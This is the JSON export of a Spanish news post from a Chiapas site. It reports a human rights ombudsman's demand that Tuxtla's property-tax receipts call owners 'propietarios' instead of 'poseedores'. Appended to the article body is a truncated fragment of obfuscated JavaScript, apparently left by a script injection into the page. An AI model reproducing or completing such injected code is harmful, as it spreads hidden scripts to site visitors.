{"id":19792,"date":"2025-01-14T04:07:24","date_gmt":"2025-01-14T04:07:24","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=19792"},"modified":"2025-01-14T04:07:25","modified_gmt":"2025-01-14T04:07:25","slug":"piden-corregir-error-en-la-boleta-predial","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=19792","title":{"rendered":"Piden corregir error en la boleta predial"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"766\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG_20250113_151220-1024x766.jpg\" alt=\"\" class=\"wp-image-19793\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG_20250113_151220-1024x766.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG_20250113_151220-300x224.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG_20250113_151220-768x574.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG_20250113_151220-1536x1149.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG_20250113_151220-2048x1532.jpg 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Manuel Jim\u00e9nez.<\/p>\n\n\n\n<p>13 de enero del 2025. Tuxtla Guti\u00e9rrez El presidente de la Comisi\u00f3n Estatal de Derechos Humanos, Horacio Culebro Borrayas hizo un llamado al presidente municipal de Tuxtla para que se corrija lo antes posible un error emitido en la boleta del pago predial emitida en este 2025.<\/p>\n\n\n\n<p>De acuerdo con el ombudsman en este documento que se expidi\u00f3 se cita como \u201cposeedores\u201d y no como \u201cpropietarios a los due\u00f1os de las viviendas que deben cumplir con este pago.<\/p>\n\n\n\n<p>En este sentido puntualiz\u00f3 que el ser poseedor no es lo mismo que ser propietario de un bien inmueble, es decir el primero puede ocupar una propiedad por invasi\u00f3n, mientras que el segundo es el que cuenta con la documentaci\u00f3n y una escritura p\u00fablica que lo avalan como due\u00f1o.<\/p>\n\n\n\n<p>\u201cEn la boleta, sale que ya no es un uno propietario de la vivienda sino que es uno poseedor, y ac\u00e1 las dos palabras tienen significados muy diferentes\u201d, coment\u00f3.<\/p>\n\n\n\n<p>Por esta raz\u00f3n, hizo un llamado para que se corrija este error que atenta contra los derechos de los ciudadanos, y no debe tomarse a la ligera.<\/p>\n\n\n\n<p>\u201cEn mi caso tengo una vivienda desde hace m\u00e1s de 40 a\u00f1os, y tenemos una escritura. En la boleta aparezco como poseedor, pero lo que resulta preocupante es que ante el reclamo ciudadano, el presidente municipal ha sido omiso\u201d, expres\u00f3.<\/p>\n\n\n\n<p>Consider\u00f3 como un error el que, el presidente municipal afirma que no cambia nada al hace esta sustituci\u00f3n de los t\u00e9rminos pero ocurre lo contrario.<\/p>\n\n\n\n<p>\u201cNo creo que alguno de nosotros quiera perder el derecho de propiedad para ser un simple poseedor. El d\u00eda de hoy enviar\u00e9 una carta al presidente municipal para que en aras de una buena pol\u00edtica de humanismo se cambien los recibos prediales y se ponga el nombre correcto de propietario\u201d, manifest\u00f3.<\/p>\n\n\n\n<p>Puntualiz\u00f3 que, en caso de que el alcalde no acceda a tomar esta recomendaci\u00f3n la Comisi\u00f3n Estatal de Derechos Humanos acudir\u00e1 a un amparo.<br><\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Manuel Jim\u00e9nez. 13 de enero del 2025. Tuxtla Guti\u00e9rrez El presidente de la Comisi\u00f3n Estatal de Derechos Humanos, Horacio Culebro Borrayas hizo un llamado al presidente municipal de Tuxtla para que se corrija lo antes posible un error emitido en la boleta del pago predial emitida en este 2025. De acuerdo con el ombudsman en &hellip;<\/p>\n","protected":false},"author":2,"featured_media":19793,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-19792","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19792","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=19792"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19792\/revisions"}],"predecessor-version":[{"id":19794,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19792\/revisions\/19794"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/19793"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=19792"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=19792"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=19792"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}